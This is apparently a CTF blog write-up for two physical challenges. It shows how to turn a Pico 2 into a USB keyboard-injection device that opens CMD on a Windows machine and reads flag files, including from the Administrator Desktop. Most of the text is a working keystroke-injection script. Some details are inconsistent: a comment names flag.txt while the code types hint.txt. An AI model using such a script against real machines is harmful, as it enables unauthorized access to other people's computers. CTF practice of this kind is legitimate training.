Hello there,
In this second blog post about the Oxyhack Cyberevent CTF I will share some write-ups for the physical challenges that were indubitably fun ! Shout out to Baptiste Rebillard for the great pico2 tinkering.
Physical #
Quack #
We don’t have a keyboard and a “flag.txt” is watching us from the desktop of this “computer” (that uses windows, sigh)
We just need to flash the MicroPython firmware on the pico2 card :
- press the BOOTSEL button and release it after few seconds
- download micropython for pico2 here
- set the .uf2 file in the pico2
- then wait few seconds, he will restart automatically
- download the adafruit circuit python bundle here
- in the “lib” directory, insert “adafruit_hid”
Then everything is set up, you can upload a main.py or code.py that will automatically run when the pico2 is powered.
For example, we can simulate a keyboard that :
- presses CTRL + R
- types “CMD”
- presses enter (in order to run the terminal)
- types “d %USERPROFILE%\Desktop”
- presses enter
- types “type flag.txt”
- presses enter
And normally it should read the flag.txt file.
In python now :
import time
import board
import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keycode import Keycode
keyboard = Keyboard(usb_hid.devices)
# In order to have the time to delete the code.py without running the commands
# if we connect the pico to our computer (for example to change the code.py)
time.sleep(4)
# Closing all tabs
for _ in range(3):
keyboard.press(Keycode.ALT)
keyboard.press(Keycode.F4)
keyboard.release_all()
time.sleep(0.1)
# Start CMD
keyboard.press(Keycode.WINDOWS)
keyboard.press(Keycode.R)
keyboard.release_all()
time.sleep(3)
keyboard.press(Keycode.C);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.M);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.D);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.ENTER)
keyboard.release_all()
time.sleep(1)
# Write "cd %USERPROFILE%\\Desktop"
keyboard.press(Keycode.C);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.D);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.SPACE);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.SHIFT)
keyboard.press(Keycode.FIVE);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.U);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.S);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.E);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.R);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.P);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.R);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.O);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.F);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.I);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.L);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.E);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.SHIFT)
keyboard.press(Keycode.FIVE);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.BACKSLASH);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.BACKSLASH);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.D);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.E);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.S);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.K);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.T);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.O);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.P);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.ENTER);keyboard.release_all();time.sleep(0.1)
# Write "type flag.txt"
keyboard.press(Keycode.T);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.Y);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.P);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.E);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.SPACE);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.H);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.I);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.N);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.T);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.PERIOD);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.T);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.X);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.T);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.ENTER)
keyboard.release_all()
# Wait 10 second in order to see the flag
time.sleep(10)
# Closing all tabs
for _ in range(3):
keyboard.press(Keycode.ALT)
keyboard.press(Keycode.F4)
keyboard.release_all()
time.sleep(0.1)
Well, that was a lot of code 🤯🤯🤯 Now here’s the result for a bit more of fun :
OHxY{qu4ck_th3_w4y_t0_fl4g}
Hack the Allfather #
Following the same method as “Quack” to see the content of the HINT.txt file. Then we’re looking for something on the machine, but we don’t know what.
First, we need to know what we’re looking for, so we can for example execute : “dir c:\flag.txt /s /p” in order to scan the “C:" recursively.
And last step : “type C:\Users\Administrator\Desktop\flag.txt”
OHxY{0d1n5_s3cr3ts_f0r_v1ct0ry_in_v4lh4ll4}